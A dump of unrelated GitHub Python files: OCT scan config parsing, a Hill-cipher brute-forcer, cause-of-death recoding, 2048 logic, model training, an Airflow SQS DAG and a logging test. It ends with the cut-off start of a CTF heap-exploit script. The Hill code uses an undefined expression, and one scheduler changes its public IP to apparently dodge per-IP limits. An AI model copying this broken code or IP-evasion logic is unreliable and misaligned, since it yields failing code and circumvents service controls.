else:\n config_dict = {}\n for key, val in config[section_title].items():\n if key in key_type:\n config_dict[key] = key_type[key](val)\n else:\n try:\n config_dict[key] = float(val)\n except ValueError:\n config_dict[key] = val\n return config_dict\n\n\n @staticmethod\n def return_num_scanlines(xml_file=None, scan_params=None):\n if xml_file is None:\n if scan_params is None:\n raise ('Both inputs can\\'t be None')\n else:\n num_scans_to_view = np.size(np.arange(scan_params['top_crd'], scan_params['top_crd'] - scan_params['scan_height'], -scan_params['hatch_spacing']))\n return int(num_scans_to_view)\n else:\n ec1000_commands = OCTScanConfig.return_list_of_xml_commands(xml_file)\n return_number_of_jump_commands = 0\n for child in ec1000_commands:\n if child.tag.lower() == 'JumpAbs'.lower():\n return_number_of_jump_commands += 1\n\n return int(return_number_of_jump_commands / 2)\n\n @staticmethod\n def return_list_of_xml_commands(xml_file=None):\n with open(xml_file, 'r') as f:\n xml_string = f.read()\n # open xml file and parse\n try:\n tree = ET.parse(xml_string)\n root = tree.getroot()\n except: # if it doesn't have overarching tag, then add it\n xml_string = \"\\n\" + xml_string + \"\\n\"\n root = ET.fromstring(xml_string)\n xml_commands = list(root)\n return xml_commands\n","repo_name":"Adam-D-Lewis/OCT_Workflow_Package","sub_path":"Pipe_And_Filter_Autosection/classes/OCTScanConfig.py","file_name":"OCTScanConfig.py","file_ext":"py","file_size_in_byte":5804,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"39"} +{"seq_id":"74651651953","text":"####################################################################################################\n# Dec_Hill.py\n# Hill2x2 decryption functions\n# Written by - Ravi Padma\n####################################################################################################\nimport random\ndef c2i(character):\n #print('c2i:',ord(character)-ord('a'))\n return ord(character)-ord('A')\n\ndef i2c(encoded):\n #print('i2c:',chr(ord('a') + encoded))\n return chr(ord('a') + encoded)\n\ndef fitness(sometext):\n score=0\n fitwords= [\"the\", \"of\", \"and\", \"to\", \"in\", \"is\", \"you\", \"that\", \"there\", \"it\", \"he\", \"she\", \"was\", \"for\", \"on\", \"are\", \"as\", \"with\", \"his\", \"they\", \"at\", \"be\", \"this\", \"have\", \"from\", \"if\", \"were\", \"their\", \"him\", \"her\"]\n\n for word in fitwords:\n score += sometext.count(word)*len(word)\n #print(score)\n return score\n\ndef hill_enc(plain):\n found = False\n a=1\n b=1\n c=1\n d=1\n while not found:\n a,b,c,d = [random.randint(0,25) for i in range(4)]\n det = (ad - bc) % 26\n det2 = ((a-1)*d - b*(c-1)) % 26\n if (det % 2 != 0 ) and (det % 13 != 0) and (det2 % 26 != 0):\n found = True\n secret = ''\n for i in range(0, len(plain), 2):\n i1 = c2i(plain[i])\n i2 = c2i(plain[i+1])\n c1 = (i1*a + i2*b) % 26\n c2 = (i1*c + i2*d) % 26\n secret += i2c(c1) + i2c(c2)\n return secret, [a,b,c,d]\n\ndef hill_dec(inplain, a,b,c,d):\n secret = ''\n for i in range(0, len(inplain), 2):\n i1 = c2i(inplain[i])\n i2 = c2i(inplain[i+1])\n c1 = (i1*a + i2*b) % 26\n c2 = (i1*c + i2*d) % 26\n secret += i2c(c1) + i2c(c2)\n #secret += c2i(c1) + c2i(c2)\n return secret\n\nCT1='tswenajgdnaxwhswurmdbagkitxuyofqnkormdsrxdlmpkdkxdootvysewdiagkkguzbvqwexdrayqnajqzqtsxdvgtsgqcvqbfeatgqgvdwweuuztxddwakevhhlmqotosokzrufetscxucurdiveuuhzcivtukrdvquhbwvgiaanaxxdlcwgmcvzjekygijitswscocvyffopcxdlmswrdxdwumdhzwklmswrdqragkyewitbamwwezhweqemdklxdxyjgavbaxdgiirqswviraguhvtkzvmjejukyefsfirqszjwgdwtsugxuxdnkoopohygitiurdikbegypfeibhzmgklcopcyvcrtsirelmsbaugywvtbescavoraggnbecoaxkbnpwvdiavhhawatbaytxuaxagkbhzwvezxudikynawlajmdtypdkzitpobonkxdlmziiryhicaxkbapawkpkbqkopicklfecbksyfsfbcjlbonkxdlmziirivryfemqejxuirurtljetiwuzbycrkpdwkseicmdsrcmlkvgeyjicebrgioqcvituxqkdxnkweqrwedicxqfbe'\n\nI=0\nbestscor=0\nTEXT=CT1.upper()\nprint(TEXT)\nfor a in range(26):\n for b in range(26):\n for c in range(26):\n for d in range(26):\n score=fitness(hill_dec(TEXT,a,b,c,d))\n if (a > I):\n I=a\n print (I)\n if (score > bestscor):\n print(score,hill_dec(TEXT, a, b, c, d))\n bestscor=score","repo_name":"ravpad/23S-CPEG672-610","sub_path":"Module 1 Black Hat Challenge/Dec_Hill.py","file_name":"Dec_Hill.py","file_ext":"py","file_size_in_byte":2643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"39615568964","text":"\nimport pandas as pd\nimport numpy as np\n\nfrom cod_prep.claude.cod_process import CodProcess\nfrom cod_prep.downloaders.causes import (\n add_cause_metadata,\n get_all_related_causes\n)\nfrom cod_prep.downloaders.nids import add_nid_metadata\nfrom cod_prep.claude.configurator import Configurator\nimport warnings\n\nclass Recoder(CodProcess):\n\n id_cols = ['nid', 'extract_type_id', 'location_id', 'year_id',\n 'age_group_id', 'sex_id', 'cause_id',\n 'site_id']\n val_cols = ['deaths', 'deaths_rd', 'deaths_corr', 'deaths_raw']\n\n def __init__(self, cause_meta_df, source, code_system_id, data_type_id):\n self.source = source\n self.code_system_id = code_system_id\n self.data_type_id = data_type_id\n self.cause_meta_df = cause_meta_df\n self.conf = Configurator(\"standard\")\n self.vr_indicators_path = self.conf.get_resource('vr_indicators')\n self.cache_options = {\n 'force_rerun': False,\n 'block_rerun': True,\n 'cache_results': False,\n 'cache_dir': self.conf.get_directory('db_cache')\n }\n\n def get_computed_dataframe(self, df):\n\n if 'data_type_id' not in df.columns:\n df = add_nid_metadata(df, \"data_type_id\", **self.cache_options)\n df = self.recode(df)\n df = self.conform_secret_causes(df)\n df = self.clean_up(df)\n\n return df\n\n def get_diagnostic_dataframe(self):\n \"\"\"Return diagnostics.\"\"\"\n pass\n\n def recode_sids(self, df):\n path_to_4_stars_sheet = self.conf.get_resource(\"four_star_locations\")\n four_five_star_locs = pd.read_csv(path_to_4_stars_sheet)\n four_five_star_locs = four_five_star_locs[['location_id']]\n four_five_star_locs = four_five_star_locs.location_id.unique()\n less_than_four_star = ~df['location_id'].isin(four_five_star_locs)\n is_sids = df['cause_id'] == 686\n df.loc[is_sids & less_than_four_star, 'cause_id'] = 380\n return df\n\n def clean_up(self, df):\n \"\"\"Group rogue duplicates.\"\"\"\n df = df.groupby(self.id_cols, as_index=False)[self.val_cols].sum()\n return df\n\n def conform_secret_causes(self, df):\n\n df = add_cause_metadata(\n df, add_cols=['secret_cause', 'parent_id'],\n cause_meta_df=self.cause_meta_df,\n **self.cache_options\n )\n injuries_replace_parents = [722, 720, 719]\n replaced_injuries = df['cause_id'].isin(injuries_replace_parents)\n df.loc[replaced_injuries, 'parent_id'] = 723\n secret_causes = df['secret_cause'] == 1\n not_cc_code = df['cause_id'] != 919\n len_before = len(df)\n if df['parent_id'].isnull().values.any():\n raise AssertionError(\n 'There are missing parent cause_ids'\n )\n df.loc[secret_causes & not_cc_code, 'cause_id'] = df['parent_id']\n len_after = len(df)\n if len_before != len_after:\n raise AssertionError(\n 'The length of the dataframe has changed from {} to {}'.format(\n len_before, len_after\n )\n )\n df.drop(['parent_id', 'secret_cause'], axis=1, inplace=True)\n return df\n\n def drop_leukemia_subtypes(self, df):\n\n leuk_subtypes = get_all_related_causes('neo_leukemia', self.cause_meta_df)\n\n leuk_subtypes.remove(487)\n\n df.loc[\n (df['cause_id'].isin(leuk_subtypes)) & (df['deaths_rd'] > 0) &\n (df['deaths_raw'] <= 0), 'cause_id'\n ] = 487\n\n return df\n\n \n def recode(self, df):\n \n cause_metadata_df = self.cause_meta_df\n cause_metadata_df = cause_metadata_df[[\"cause_id\",\n \"path_to_top_parent\",\n \"acause\"]]\n ckd_cause_ids = get_all_related_causes('ckd', cause_metadata_df)\n ckd_cause_ids.remove(593)\n ckd_less_other = df['cause_id'].isin(ckd_cause_ids)\n neonate = df['age_group_id'].isin([2, 3])\n df.loc[ckd_less_other & neonate, 'cause_id'] = 652\n\n resp_ids = [509, 515, 516, 520]\n is_cert_resp_causes = df['cause_id'].isin(resp_ids)\n\n df.loc[is_cert_resp_causes & neonate, 'cause_id'] = 322\n\n is_asthma = df['cause_id'] == 515\n df.loc[is_asthma & (df['age_group_id'] == 4), 'cause_id'] = 322\n\n maternal_cause_ids = get_all_related_causes(366, cause_metadata_df)\n maternal_cause_ids = df['cause_id'].isin(maternal_cause_ids)\n\n non_maternal_ages = np.logical_not(\n df['age_group_id'].isin([7, 8, 9, 10, 11, 12, 13, 14, 15, 22])\n )\n df.loc[maternal_cause_ids & non_maternal_ages, 'cause_id'] = 919\n\n alzheimers = df['cause_id'] == 543\n under_40 = df['age_group_id'].isin(range(1, 13, 1))\n df.loc[alzheimers & under_40, 'cause_id'] = 919\n\n cong_causes = get_all_related_causes('cong', cause_metadata_df)\n congenital = df['cause_id'].isin(cong_causes)\n over_70 = df['age_group_id'].isin([19, 20, 30, 31, 32, 235])\n df.loc[congenital & over_70, \"cause_id\"] = 919\n\n hepatitis = get_all_related_causes(400, cause_metadata_df)\n hepatitis = df['cause_id'].isin(hepatitis)\n if self.code_system_id in [7, 9]:\n df.loc[hepatitis & neonate, \"cause_id\"] = 380\n else:\n df.loc[hepatitis & neonate, \"cause_id\"] = 384\n\n inj_disaster_light = df['cause_id'] == 984\n df.loc[inj_disaster_light, 'cause_id'] = 716\n\n if self.code_system_id not in [1, 6]:\n ckd_diabetes = df['cause_id'].isin([997, 998])\n df.loc[ckd_diabetes, 'cause_id'] = 589\n\n if self.code_system_id not in [1, 6, 9]:\n diabetes_subtypes = df['cause_id'].isin([975, 976])\n df.loc[diabetes_subtypes, 'cause_id'] = 587\n\n diabetes_type_2 = df['cause_id'] == 976\n under_15 = df['age_group_id'] < 8\n df.loc[diabetes_type_2 & under_15, 'cause_id'] = 975\n\n iron_or_iodine = df['cause_id'].isin([388, 390])\n df.loc[iron_or_iodine, 'cause_id'] = 919\n\n under_1 = df['age_group_id'] < 5\n cvd_ihd = df['cause_id'] == 493\n df.loc[cvd_ihd & under_1, 'cause_id'] = 643\n\n if 686 in df.cause_id.unique():\n df = self.recode_sids(df)\n\n df.loc[df.cause_id.isin([344, 409, 410,\n 542, 558, 669,\n 680, 961]), 'cause_id'] = 919\n\n if self.data_type_id not in [6, 7, 8]:\n df.loc[df['cause_id'] == 687, 'cause_id'] = 919\n\n one_to_14 = df['age_group_id'].isin([5, 6, 7])\n cvd_ihd = df['cause_id'] == 493\n df.loc[cvd_ihd & one_to_14, 'cause_id'] = 507\n\n cancer_recodes = get_all_related_causes([411, 414, 423, 426, 429, 432,\n 435, 438, 441, 444, 450, 453,\n 456, 459, 462, 465, 468, 474,\n 486, 483], cause_metadata_df)\n cancer_recodes = df['cause_id'].isin(cancer_recodes)\n cancer_ages = df['age_group_id'].isin(range(2, 8, 1))\n df.loc[cancer_recodes & cancer_ages, \"cause_id\"] = 489\n\n not_icd10 = self.code_system_id != 1\n neo_meso = df['cause_id'] == 483\n df.loc[neo_meso & not_icd10, \"cause_id\"] = 489\n\n if self.source.endswith(\"AAMSP\"):\n digest_hernia = df['cause_id'].isin([531])\n df.loc[digest_hernia, \"cause_id\"] = 919\n\n\n if self.source == \"\":\n homicide_and_suicide = df['cause_id'].isin([724, 725, 726, 727, 941,\n 718, 719, 720, 721, 722, 723])\n bad_years = df['year_id'].isin(range(2007, 2015))\n # _unintent\n df.loc[bad_years & homicide_and_suicide, \"cause_id\"] = 919\n\n\n inj_war = get_all_related_causes(945, cause_metadata_df)\n is_inj_war = df['cause_id'].isin(inj_war)\n jamaica = df['location_id'] == 115\n year_2005 = df['year_id'] == 2005\n vr = df['data_type_id'] == 9\n df.loc[is_inj_war & jamaica & year_2005 & vr, 'cause_id'] = 724\n\n inj_mech_gun = df['cause_id'] == 705\n year_2006 = df['year_id'] == 2006\n df.loc[inj_mech_gun & year_2006 & jamaica & vr, 'cause_id'] = 724\n\n if self.source == \"ICD10\":\n digest_ibd = df['cause_id'] == 532\n suriname = df['location_id'] == 118\n year_1995_2012 = df['year_id'].isin(range(1995, 2013, 1))\n df.loc[digest_ibd & suriname & year_1995_2012, 'cause_id'] = 526\n\n endo_prodcedural = df['cause_id'] == 624\n df.loc[endo_prodcedural, 'cause_id'] = 708\n\n\n schizo = df['cause_id'] == 559\n tibet = df['location_id'] == 518\n df.loc[schizo & tibet, 'cause_id'] = 919\n\n hiv = get_all_related_causes(298, cause_metadata_df)\n hiv = df['cause_id'].isin(hiv)\n pre_1980 = df['year_id'] < 1980\n df.loc[hiv & pre_1980, 'cause_id'] = 919\n\n diabetes_causes = get_all_related_causes(587, cause_metadata_df)\n diabetes = df['cause_id'].isin(diabetes_causes)\n df.loc[neonate & diabetes, 'cause_id'] = 380\n\n under_20 = df['age_group_id'].isin(range(0, 8, 1))\n stroke = get_all_related_causes(\n 'cvd_stroke', cause_metadata_df\n )\n stroke_deaths = df['cause_id'].isin(stroke)\n va = df['data_type_id'] == 8\n \n df.loc[under_20 & stroke_deaths & va, 'cause_id'] = 491\n\n over_95 = df['age_group_id'] == 235\n inj_trans_road_pedal = df['cause_id'] == 691\n df.loc[over_95 & inj_trans_road_pedal, 'cause_id'] = 919\n\n df.loc[schizo, 'cause_id'] = 919\n\n if self.source == \"Russia_FMD_1999_2011\":\n cvd_pvd = df['cause_id'] == 502\n df.loc[cvd_pvd, 'cause_id'] = 491\n\n if self.source == \"\":\n sui_homi_causes = [717, 718, 719, 720, 721, 722, 723,\n 724, 725, 726, 727, 941]\n sui_homi = df['cause_id'].isin(sui_homi_causes)\n bad_years = df['year_id'].isin(range(2007, 2015))\n df.loc[sui_homi & bad_years, 'cause_id'] = 919\n\n if \"India_MCCD\" in self.source:\n non_neonates = np.logical_not(df['age_group_id'].isin([2, 3]))\n neonatal_sepsis = df['cause_id'].isin([])\n df.loc[non_neonates & neonatal_sepsis, 'cause_id'] = 380\n\n if self.source == \"India_SCD_states_rural\":\n warnings.warn(\"Implement SCD rd artifact recode\")\n\n\n inj_war_execution = df['cause_id'] == 854\n\n if self.source == \"ICD9_BTL\":\n ecuador = df['location_id'] == 122\n year_1980_1990 = df['year_id'].isin(range(1980, 1991, 1))\n df.loc[inj_war_execution & ecuador & year_1980_1990,\n 'cause_id'] = 855\n\n bih = df['location_id'] == 44\n year_1985_1991 = df['year_id'].isin([1985, 1986, 1987, 1988,\n 1989, 1990, 1991])\n df.loc[inj_war_execution & bih &\n year_1985_1991, 'cause_id'] = 855\n\n warnings.warn(\"BTL cancer recode needed\")\n\n if self.source == \"ICD10\":\n irq = df['location_id'] == 143\n year_2008 = df['year_id'] == 2008\n df.loc[inj_war_execution & year_2008 & irq, 'cause_id'] = 855\n\n if self.source == \"ICD9_detail\":\n if ((df['location_id'] == 43) & (df['year_id'] == 1997)).any():\n warnings.warn(\"Albania homicide recode needed\")\n\n if self.source == \"ICD9_USSR_Tabulated\":\n warnings.warn(\"Missing some homicide fixes for TJK, ARM here.\")\n\n df = self.drop_leukemia_subtypes(df)\n\n if self.data_type_id in [1, 3, 5, 7]:\n maternal_causes = get_all_related_causes('maternal', cause_metadata_df)\n injury_causes = get_all_related_causes('_inj', cause_metadata_df)\n maternal = df['cause_id'].isin(maternal_causes)\n inj = df['cause_id'].isin(injury_causes)\n df.loc[~(maternal | inj), 'cause_id'] = 919\n\n if self.data_type_id == 5:\n df.loc[~maternal, 'cause_id'] = 919\n\n return df\n","repo_name":"ihmeuw/ihme-modeling","sub_path":"gbd_2017/shared_code/cod_database/06_Misclassification_correction/recode.py","file_name":"recode.py","file_ext":"py","file_size_in_byte":12327,"program_lang":"python","lang":"en","doc_type":"code","stars":85,"dataset":"github-code","pt":"39"} +{"seq_id":"6692277054","text":"from random import choice, randint\nfrom copy import deepcopy\n\n# adds to direction given as string: RIGHT, LEFT, UP, DOWN\ndef addTheGrid(map, direction): \n\n if direction == 'RIGHT':\n for c in range(len(map)):\n for m in range(3, 0, -1):\n for k in range(1, 1 + m):\n if map[c][m] == map[c][m-k] and map[c][m] != 0:\n map[c][m] += 1\n map[c][m - k] = 0\n break\n elif map[c][m] != map[c][m-k] and map[c][m] != 0 and map[c][m-k] != 0: break\n\n elif direction == 'LEFT': \n for c in range(len(map)):\n for m in range(0, 3):\n for k in range(1, 4 - m):\n if map[c][m] == map[c][m+k] and map[c][m] != 0:\n map[c][m] += 1\n map[c][m + k] = 0 \n break\n elif map[c][m] != map[c][m+k] and map[c][m] != 0 and map[c][m+k] != 0: break\n \n elif direction == 'UP': \n for m in range(len(map[0])):\n for c in range(0, 3):\n for k in range(1, 4 - c):\n if map[c][m] == map[c+k][m] and map[c][m] != 0:\n map[c][m] += 1\n map[c + k][m] = 0 \n break\n elif map[c][m] != map[c+k][m] and map[c][m] != 0 and map[c+k][m] != 0: break\n\n elif direction == 'DOWN': \n for m in range(len(map[0])):\n for c in range(3, 0, -1):\n for k in range(1, 1 + c):\n if map[c][m] == map[c-k][m] and map[c][m] != 0:\n map[c][m] += 1\n map[c - k][m] = 0 \n break\n elif map[c][m] != map[c-k][m] and map[c][m] != 0 and map[c-k][m] != 0: break\n\n\n# then moves the numbers to empty boxes to direction given as string: RIGHT, LEFT, UP, DOWN\ndef moveTheGrid(map, direction):\n if direction == 'RIGHT':\n for i in range(len(map)):\n for m in range(2, -1, -1): \n for k in range(3, m, -1):\n if map[i][k] == 0:\n map[i][k] = map[i][m]\n map[i][m] = 0\n break\n \n elif direction == 'LEFT':\n for i in range(len(map)):\n for m in range(1, 4): \n for k in range(m):\n if map[i][k] == 0:\n map[i][k] = map[i][m]\n map[i][m] = 0\n break\n\n elif direction == 'UP':\n for i in range(len(map)):\n for m in range(1, 4):\n for k in range(m):\n if map[k][i] == 0:\n map[k][i] = map[m][i]\n map[m][i] = 0\n break\n\n elif direction == 'DOWN':\n for i in range(len(map)):\n for m in range(2, -1, -1): \n for k in range(3, m, -1):\n if map[k][i] == 0:\n map[k][i] = map[m][i]\n map[m][i] = 0\n break\n\n\n# firstly calls addTheGrid() function to add the necessary boxes\n# then calls moveTheGrid() function to fill in the empty boxes\n# returns true if a move is made, false if no move is made\ndef setNewGrid(map, direction):\n fmap = deepcopy(map)\n addTheGrid(map, direction)\n moveTheGrid(map, direction)\n if fmap == map:\n return False\n return True\n\n\n# creates a new number on the grid\ndef randomNumberGeneration(map):\n emptyspots = []\n for i in range(4):\n for m in range(4):\n if map[i][m] == 0: emptyspots.append((i, m))\n \n randomIndex = choice(emptyspots)\n\n # chosing randomly between 4 or 2, chance for 2 is 90%, chance for 4 is 10%\n twoOrFour = randint(1, 10)\n if twoOrFour > 9: map[randomIndex[0]][randomIndex[1]] = 2\n else: map[randomIndex[0]][randomIndex[1]] = 1\n\n# checks if there are any available moves\ndef checkIfLost(map):\n copy1, copy2, copy3, copy4 = [deepcopy(map) for i in range(4)]\n setNewGrid(copy1, \"RIGHT\")\n setNewGrid(copy2, \"LEFT\")\n setNewGrid(copy3, \"UP\")\n setNewGrid(copy4, \"DOWN\")\n\n # returns True if both of the copies are same as initial grid\n if copy1 == map and copy2 == map and copy3 == map and copy4 == map:\n return True\n return False ","repo_name":"EgeSaykan/2048-AI","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":4467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"17986659091","text":"import torch\nimport torchvision\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torchvision import transforms\nfrom Conv2model import Conv2Model\nfrom read import ReadHandler\nfrom torch.utils.data import DataLoader \nfrom torch.utils.data import TensorDataset\nfrom torch.autograd import Variable\n\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\") #使用cuda\nnum_epoch=20\nnum_classes=68,\nbatch_size=20\nlearning_rate=0.001\n\nfile_list=['05','07','09','27','29']\ntrain_feature=[0]*5\ntrain_target=[0]*5\nfor i in range(5):\n readfile=ReadHandler('PIE dataset/Pose{id}_64x64.mat'.format(id=file_list[i]))\n train_feature[i],train_target[i]=readfile.read_train()\n train_feature[i]=torch.Tensor(train_feature[i]).view(-1,1,64,64).float().to(device)\n train_target[i]=torch.Tensor(train_target[i]).long().to(device)\n print(len(train_target[i]))\n\nread_feature=torch.cat((train_feature[0],train_feature[1],train_feature[2],train_feature[3],train_feature[4]),0)\nread_target=torch.cat((train_target[0],train_target[1],train_target[2],train_target[3],train_target[4]),0)\ntrain_feature=read_feature\ntrain_target=read_target\nprint(train_feature.shape,train_target.shape)\n\n\ntrain_dataset= TensorDataset(train_feature,train_target)\ntrain_loader=DataLoader(train_dataset,batch_size=batch_size,shuffle=True)\n\n\nmodel=Conv2Model().to(device)\ncriterion = torch.nn.CrossEntropyLoss()\noptimizer = torch.optim.Adam(model.parameters(),lr=learning_rate)\n\ntotal=len(train_target)\n\nfor epoch in range(num_epoch):\n total_correct=0\n for step,(feature,target) in enumerate(train_loader):\n feature=Variable(feature)\n target=Variable(target)\n\n output=model(feature)\n loss=criterion(output,target)\n \n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n batch_size=target.size(0)\n _,predict=torch.max(output,1)\n total_correct+=(predict==target).sum().item()\n print('epoch:{} accuracy:{}'.format(epoch+1,total_correct/total))\ntorch.save(model.state_dict(),'gyc_all_conv2d.pt')\n","repo_name":"LayunGotze/FaceRecognitionPIE","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2101,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"28503050007","text":"import json\nimport logging\n\nfrom airflow import DAG\nfrom dag_utils import task_fail_slack_alert_callback\nfrom airflow.operators.python_operator import PythonOperator\nfrom airflow.contrib.sensors.aws_sqs_sensor import SQSSensor\nfrom airflow.utils.dates import days_ago\nfrom datetime import timedelta\nfrom data_pipeline.config import conf\nfrom data_pipeline.db.postgresql import connect_postgresql, update_verified_data\n\n# Logger\nlogging.basicConfig(format='%(asctime)s %(filename)s %(funcName)s %(lineno)d %(message)s')\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.DEBUG)\n\n\ndef process_sqs_events(event: dict):\n \"\"\"\n Function to process the SQS events received by the Lambda handler\n\n Args:\n event (dict): SQS event object\n\n Returns:\n verified_data (list):\n\n \"\"\"\n verified_data = []\n for message in event.get('Messages'):\n data = json.loads(message.get('Body'))\n verified_data.append(data)\n return verified_data\n\n\ndef sync_verified_data_func(context):\n \"\"\"\n Function to parse the SQS message\n Args:\n context:\n\n Returns: None\n\n \"\"\"\n sqs_message = context.get('task_instance').xcom_pull('sqs_message_sensor_task', key='messages')\n logger.info(sqs_message)\n verified_data = process_sqs_events(sqs_message)\n if verified_data:\n pg_connection = connect_postgresql()\n for data in verified_data:\n res = update_verified_data(\n pg_connection,\n data.get('entity'),\n data.get('company_id'),\n data.get('external_id'),\n data.get('verified_data'),\n )\n if res:\n logger.info(\n f'''Successfully updated the verified_data in `verified_{data.get('entity')}`\n table for (company_id - {data.get('company_id')}, external_id - {data.get('external_id')})'''\n )\n else:\n logger.info(\n f'''Failed to update the verified_data in `verified_{data.get('entity')}`\n table for (company_id - {data.get('company_id')}, external_id - {data.get('external_id')})'''\n )\n\n\ndefault_args = {\n 'owner': 'Airflow',\n 'start_date': days_ago(30),\n 'depends_on_past': False,\n 'retries': 0,\n 'on_failure_callback': task_fail_slack_alert_callback,\n}\n\nsqs_sensor_dag = DAG(\n 'SQS_VERIFIED_DATA_SYNC_SENSOR_DAG',\n default_args=default_args,\n schedule_interval=timedelta(minutes=2),\n max_active_runs=1,\n)\n\nsqs_message_sensor_task = SQSSensor(\n dag=sqs_sensor_dag,\n task_id='sqs_message_sensor_task',\n aws_conn_id=conf.get('AWS_CONN_ID', None),\n wait_time_seconds=10,\n sqs_queue=conf.get('SQS_SYNC_VERIFIED_DATA_QUEUE_URL', None),\n)\n\nsync_verified_data_task = PythonOperator(\n task_id='sync_verified_data_task',\n dag=sqs_sensor_dag,\n python_callable=sync_verified_data_func,\n provide_context=True,\n)\n\nsqs_message_sensor_task >> sync_verified_data_task\n","repo_name":"grohan2002/datapipeline-dags","sub_path":"sqs_sync_verified_data_dag.py","file_name":"sqs_sync_verified_data_dag.py","file_ext":"py","file_size_in_byte":3021,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"16585155487","text":"# -*- coding: utf-8 -*-\nimport argparse\n\nimport logging\nfrom subprocess import Popen, PIPE\nimport time\n\nimport cipip as pyipip\nimport requests\n\n\nLOGGER = logging.getLogger(__name__)\n\n\nclass STATE(object):\n INIT = 0\n OK = 1\n CHANGING = 2\n\n\nclass Aso100Scheduler(object):\n\n def __init__(self, options):\n self.options = options\n self.currentIp = ''\n self.previousIp = ''\n\n # self.state = STATE.INIT\n self.state = STATE.OK\n\n self.workCount = 0\n\n self.controlHandle = None\n self.proxyHandle = None\n\n # self.controlTunnel()\n\n self.ipip = None\n\n def controlTunnel(self):\n cmd = '/usr/bin/ssh -vTN {} -L 127.0.0.1:{}:127.0.0.1:{} {}@{}'\n identity = ''\n cmd = cmd.format(\n identity,\n self.options.local_proxy_port,\n self.options.remote_proxy_port,\n self.options.remote_user,\n self.options.remote_host,\n )\n self.controlHandle = p = Popen(\n cmd, shell=True, stdout=PIPE, stderr=PIPE)\n\n def oneRun(self):\n\n # FIXME: STATE == CHANGING 状态太久的话需要有个处理\n\n currentIp = self.getIp()\n LOGGER.error('currentIp: %s', currentIp)\n\n if not currentIp:\n return\n\n self.currentIp = currentIp\n\n if self.previousIp != self.currentIp:\n geo1 = self.geoip(self.previousIp)\n LOGGER.error('before %s %s', self.previousIp, geo1)\n geo2 = self.geoip(self.currentIp)\n LOGGER.error('after %s %s', self.currentIp, geo2)\n self.changePost()\n return\n\n if self.previousIp == self.currentIp:\n if self.needChange():\n LOGGER.error('>>> do change')\n if not self.changeIp():\n LOGGER.error('!!! change req failed!!!')\n return\n\n def postRun(self):\n self.previousIp = self.currentIp\n\n def loop(self):\n\n while True:\n ip = self.getIp()\n if ip:\n break\n\n self.previousIp = ip\n\n while True:\n self.oneRun()\n self.postRun()\n self.doWork()\n\n time.sleep(3)\n\n def needChange(self):\n if self.state == STATE.CHANGING:\n LOGGER.error('>>> IN CHANGING, skip')\n return False\n\n if self.workCount >= 3:\n LOGGER.error('>>> workCount exceeded !!!')\n return True\n\n LOGGER.error('>>> no need to change')\n return False\n\n def changePost(self):\n self.state = STATE.OK\n self.workCount = 0\n\n def doWork(self):\n if self.state == STATE.CHANGING:\n LOGGER.error('!! IN CHANGING, skip work')\n return\n\n self.workCount += 1\n LOGGER.error('>> doWork, count: %s', self.workCount)\n\n def getIp(self):\n try:\n resp = requests.get(\n 'http://127.0.0.1:3000/get-public-ip', timeout=15)\n if resp.status_code == 200:\n rv = resp.text.strip()\n return rv\n except requests.exceptions.Timeout as err:\n LOGGER.error('getIp timeout')\n except requests.exceptions.RequestException as err:\n LOGGER.exception(str(err))\n\n return ''\n\n def changeIp(self):\n rv = False\n try:\n resp = requests.get(\n 'http://127.0.0.1:3000/change-public-ip', timeout=15)\n self.state = STATE.CHANGING\n rv = resp.status_code == 202\n except requests.exceptions.Timeout as err:\n LOGGER.error('changeIp timeout')\n except requests.exceptions.RequestException as err:\n LOGGER.exception(str(err))\n\n return rv\n\n def geoip(self, ip):\n db = self.options.ipipx_database\n rv = ''\n if not db:\n return rv\n\n if self.ipip is None:\n self.ipip = pyipip.IPIPXDatabase(db)\n\n rv = self.ipip.lookup(ip)\n return rv\n\n\nap = argparse.ArgumentParser()\nap.add_argument('--remote-host', default='tmp')\nap.add_argument('--identity-file')\nap.add_argument('--local-proxy-port', type=int, default=3000)\nap.add_argument('--remote-proxy-port', type=int, default=3000)\nap.add_argument('--remote-user', default='root')\nap.add_argument('--ipipx-database')\n\noptions = ap.parse_args()\n\nscheduler = Aso100Scheduler(options)\n# 需要等连接开始\n# LOGGER.error('>>> wait tunnel to connect')\n# time.sleep(5)\n# LOGGER.error('>>> start work')\nscheduler.loop()\n","repo_name":"GSIL-Monitor/snippets","sub_path":"python/misc/aso100-scheduler.py","file_name":"aso100-scheduler.py","file_ext":"py","file_size_in_byte":4540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"16957255277","text":"import pytest\n\nfrom data_linter.logging_functions import logging_setup\n\n\n@pytest.mark.parametrize(\"context\", [\"\", \"VALIDATION\"])\ndef test_logger(context):\n log, log_stringio = logging_setup()\n test_message = \"test message\"\n expected_str_end = f\"| PROCESSING | {test_message}\\n\"\n if context:\n expected_str_end = expected_str_end.replace(\"PROCESSING\", context)\n log.info(test_message, extra={\"context\": context})\n else:\n log.info(test_message)\n\n test_out = log_stringio.getvalue()\n\n assert test_out.endswith(expected_str_end)\n","repo_name":"moj-analytical-services/data_linter","sub_path":"tests/test_logging.py","file_name":"test_logging.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"39"} +{"seq_id":"36099529150","text":"from pwn import *\n\np = process(\"./ptrace_record ./fheap\", shell=True, env={\"LD_BIND_NOW\":\"1\"})\n\n#p = remote(\"node3.buuoj.cn\", 29767)\n\nlibc = ELF(\"/lib/x86_64-linux-gnu/libc.so.6\")\n\ncontext.terminal = ['tmux', 'splitw', '-h']\n# context.log_level = 'debug'\n\ndef dbg(breakpoint):\n gdb.attach(p, breakpoint)\n\ndef create(size, string):\n 